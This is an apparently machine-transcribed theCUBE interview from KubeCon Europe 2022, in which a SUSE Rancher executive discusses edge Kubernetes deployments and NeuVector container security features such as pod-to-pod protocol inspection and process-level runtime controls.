 The Cube presents KubeCon and CloudNativeCon Europe 2022, brought to you by Red Hat, the CloudNative Computing Foundation and its ecosystem partners. Welcome to Valencia, Spain. And KubeCon, CloudNativeCon, Europe 2022. I'm your host, Keith Townsend, alongside a new host, Enrico Signoretti, senior editor, I'm sorry, senior IT analyst at GigaOwn. Enrico, welcome to the program. Thank you very much and thank you for having me. It's exciting. So thoughts, high-level thoughts of KubeCon, first time in person again in a couple of years. Well, this is amazing for several reasons. And one of the reasons is that yeah, I had the chance to meet with, you know, people like you again. I mean, we met several times over the internet, over Zoom calls. I started to hate these Zoom calls because they are really impersonal in the end. And like last night, we are together, group of friends, industry folks. It's just amazing. And a part of that, I mean, the event is really cool. There are a lot to learn from people, interviews and real people doing real stuff, not just, you know, again, impersonal calls. You don't even know if they are telling the truth. But when you can look in their eyes what they are doing, I think that makes a difference. So speaking about real people meeting people for the first time, new jobs, new roles, Greg, Moscarella, Enterprise, Container Management, and General Manager at SUSE. Welcome to the show. Welcome back, cute club alone. Thank you very much. It's awesome to be here. It's awesome to be back in person. And I completely agree with you. Like there's a certain fidelity to the conversation and a certain ability to get to know people a lot more. So it's absolutely fantastic to be here. So Greg, tell us about your new role and what SUSE has going on at KubeCon. Sure, so I joined SUSE about three months ago to lead the Rancher Business Unit, right? So our Container Management pieces. And you know, it's a fantastic time. Because if you look at the transition from virtual machines to containers and to moving to microservices right alongside that transition from on-prem to cloud, like this is a very exciting time to be in this industry. And Rancher's been setting the stage. And again, I know back to being here, Rancher's all about the community, right? So this is a very open, independent community-driven product and project. And so this is kind of like being back to our people, right? And being able to reconnect here. So, you know, doing it digital is great, but being here changes the game for us. So we feed off that community, we feed off the energy. So, and again, going back to the space and what's happening in it, great time to be in this space. And you guys have seen the transitions. You've seen, I mean, we've seen just massive adoption of containers and Kubernetes overall. And Rancher's been right there with some amazing companies doing really interesting things that I'd never thought of before. So I'm still learning on this, but it's been great so far. Yeah, and you know, when we talk about strategy about Kubernetes today, we are talking about very broad strategies. I mean, not just the data center or the cloud with, you know, maybe a smaller organization adopting Kubernetes in the cloud, but actually a large organization thinking hybrid and more and more the edge. So what's your opinion on this expansion of Kubernetes towards the edge? So I think you're exactly right. And that's actually a lot of meetings I've been having here right now. These are some of these interesting use cases. So people who, whether it be, you know, ones that are easy to understand in the telco space, right? Especially the adoption of 5G and you have all these space stations, new towers, and they have not only the core radio functions or network functions that they're trying to do there, but they have other applications they want to run on that same environment. I spoke recently with some of our good friends at a major automotive manufacturer doing things in their factories, right? That can't take the latency of being somewhere else, right? So they have robots on the factory floor. The latency that they would experience if they tried to run things in the cloud meant that robot would have moved 10 centimeters by the time, you know, the signal got back. It may not seem like a lot to you, but if you're an employee, you know, there, you know, a big 2000 pound robot being 10 centimeters closer to you may not be what you really want. There's just a tremendous amount of activity happening out there on the retail side as well. So it's amazing how people are deploying containers in retail outlets, you know, whether it be fast food and predicting what, how many french fries you need to have going at this time of day with this sort of weather, right? So you can make sure those cues are actually moving through. It's really exciting and interesting to look at all the different applications that are happening. So yes, on the Edge for sure and the public cloud for sure and the data center. And what we're finding is people on a common platform across those as well, right? So for the management piece too, but also for security and for policies around these things. So it really is going everywhere. So talk to me, how are we managing that as we think about pushing stuff out of the data center, out of the cloud, closer to the Edge, security and lifecycle management becomes like top of mind thought as challenges. How's Rancher and Susie addressing it? Yeah, so I think you're again spot on. So it starts off with the, think of it as simple, but it's not simple, it's the provisioning piece. How do we just get it installed and running, right? Then to what you just asked, the management piece of it. Everything from your firmware to your operating system to the cluster, the Kubernetes cluster that's running on that and then the workloads on top of that. So with Rancher and with the rest of Susie, we're actually tacking all those parts of the problems from bare metal on up. And so we have lots of ways for deploying that operating system. We have operating systems that are optimized for the Edge, very secure and ephemeral container images that you can build on top of. And then we have Rancher itself, which is not only managing your Kubernetes cluster, but can actually start to manage the operating system components as well as the workload components. So all from your single interface. We mentioned policy and security, so we will probably talk about it more in a little bit, but new vector, right? So we acquired a company called New Vector, just open sourced that here in January. That ability to run that level of security software everywhere again is really important, right? So again, whether I'm running it on whatever my favorite public cloud providers manage Kubernetes is or out of the Edge, you still have to have security in there and you want some consistency across that. If you had to have a different platform for each of your environments, that's just upping the complexity and the opportunity for error. So we really like to eliminate that and simplify our operators and developers' lives as much as possible. From this point of view, are you implying that you're matching self, let's say, managed clusters at the very edge now with added security? Because these are the two big problems lately. So having something that is autonomous somehow, easier to manage, especially if you are deploying hundreds of these micro clusters. And on the other hand, you need to have policy-based security that is strong enough to be sure. Again, if you have these huge robots moving too close to you because somebody hacked the cluster that is managing them, that could be a huge problem. So are you approaching these kind of problems? I mean, is it the technology that you acquired ready to do this? Yeah, I mean, it really is. I mean, there's still a lot of innovation happening. Don't get me wrong. We're going to see a lot more, not just from Susa and Rancher, but from the community, right? There's a lot happening there. But we've come a long way and we solved a lot of problems. If I think about how do you have this distributed environment? Well, something that comes down to not just all the different environments, but it's also the applications. With microservices, you have very dynamic environment now, just with your application space as well. So when we think about security, we really have to evolve from a fairly static policy where you might even be able to set an IP address and a port and some configuration on that. It's like, well, your workload's now dynamically moving. So not only do you have to have that security capability, like the ability to look at a process or look at a network connection and stop it, you have to have that manageability, right? You can't expect an operator or someone to go in and manually configure a YAML file, right? Because things are changing too fast. It needs to be that combination of convenient, easy to manage with full function and ability to protect your resources. And I think that's really one of the key things that New Vector really brings is because we have so much intelligence about what's going on there, like the configuration is pretty high level and then it just runs, right? So it's used to this dynamic environment. It can actually protect your workloads wherever it's going from pod to pod. And it's that combination, again, that manageability with that high functionality that is what's making it so popular and what brings that security to those edge locations or cloud locations or your data center. So one of the challenges you're kind of touching on is this abstraction upon abstraction. When I ran my data center, I could put, say, this IP address can't talk to this IP address on this port. Then I got next generation firewalls where I could actually do some analysis. Where are you seeing the ball moving to when it comes to customers thinking about all these layers of abstraction? IP address doesn't mean anything anymore in cloud native. Yes, I need one, but I'm not protecting based on IP address. How are customers approaching security from the namespace perspective? Well, so it's, you're absolutely right. In fact, even when you go to IPv6, like I don't even recognize IP addresses anymore. It doesn't mean anything. Just a bunch of, yes, those are numbers. Alpha numeric and colons, right? It's like I don't even know anymore, right? So yeah, so it comes back to that. Moving from a static, it's the pets versus cattle thing, right? So this static thing that I can sort of know and love and touch and kind of protect to this almost living breathing thing which is moving all around to swarm of pods moving all over the place. And so it is, I mean, that's what Kubernetes has done for the workload side of it. It's like, how do you get away from that pet to a declarative approach to identifying your workload and the components of that workload and what it should be doing? And so if we go on the security side some more, like, yeah, it's actually not even namespace. Namespace isn't good enough. If we want to get to zero trust, it's like, just because you're running in my namespace doesn't mean I trust you, right? And that's one of the really cool things about new vectors because of the, you know, we're looking at protocol level stuff within the network. So it's pod to pod every single connection we can look at and it's at the protocol layer. So if you say you're a MySQL database and I have a MySQL request going into it, I can confirm that that's actually a MySQL protocol being spoken and it's well formed, right? And I know that this endpoint, you know, which is a container image or a pod name or some, or a label, even if it's in the same namespace is allowed to talk to and use this protocol to this other pod that's running in my same namespace, right? So I can either allow or deny, and if I can look into the content that request and make sure it's well formed. So I'll give you an example is, do you guys remember the log4j challenges from not too long ago, right? It was a huge deal. So if I'm doing something that's IP and port based and namespace based, so what are my protection? What are my options for something that's got log4j embedded in? Like, I either run the risk of it running or I shut it down. Those are my options. Like, neither one of those are very good. So we can do, because again, we're at the protocol layer, it's like, ah, I can identify any log4j protocol. I can look at whether it's well formed, you know, or if it's malicious. If it's malicious, I can block it. If it's well formed, I can let it go through it. So I can actually look at those vulnerabilities. I don't have to take my service down. I can run and still be protected. And so that extra level, that ability to kind of peek into things and also go pod to pod, you know, not just namespace level, is one of the key differences. So I talk about the evolution or how we're evolving with the security. Like, we've grown a lot. We've got a lot more coming. So let's talk about that a lot more coming. What's in the pipeline for SUSE? Well, probably before we get to that, we just announced new vector five. So maybe I can catch us up on what was released last week and then we can talk a little bit about going forward. So new vector five introduced something called, well, several things, but one of the things that I can talk in more detail about is something called zero drift. So I've been talking about the network security, but we also run time security, right? So any container that's running within your environment has processes that are running in that container. What we can do is actually comes back to that manageability and configuration. We can look at the root level of trust of any process that's running. And as long as it has an inheritance, we can let that process run without any extra configuration. If it doesn't have a root level of trust, like it didn't spawn from whatever the init function was in that container, we're not going to let it run. So the configuration that you have to put in there is a lot simpler. So that's something that's in new vector five. The web application firewall, so this layer seven security inspection has gotten a lot more granular now. So it's that pod to pod security, both for ingress, egress and internal on the cluster, right? So before we get to what's in the pipeline, one question around new vector. How is that consumed and deployed? How is new vector consumed? It's deployed, yeah. Yeah, so again with new vector five and also Rancher 265, which just were released, there's actually some nice integration between them. So if I'm a Rancher customer and I'm using 265, I can actually just deploy that new vector with a couple clicks of the button in our marketplace. And we're actually tied into our role-based access control. So an administrator who has that, has the rights can just click. They're now in a new vector interface and they can start setting those policies and deploying those things out very easily. Of course, if you aren't using Rancher, you're using some other container management platform, new vector still works awesome. You can deploy it there still in a few clicks. You're just going to get into, you have to log into your new vector interface and use it from there. So that's how it's deployed. It's very simple to use. I think what's actually really exciting about that too is we've open sourced it. So it's available for anyone to go download and try and I would encourage people to give it a go. And I think there's some compelling reasons to do that now, right? So we have policy security policies, depreciated and going away pretty soon in Kubernetes. And so there's a few things you might look at to make sure you're still able to run a secure environment within Kubernetes. So I think it's a great time to look at what's coming next for your security within your Kubernetes. So Paul, we really appreciate you stopping by. From Villasillas, Spain. I'm Keith Townsend along with Enrico Sinurete. Thank you. And you're watching the QV leader in high tech coverage.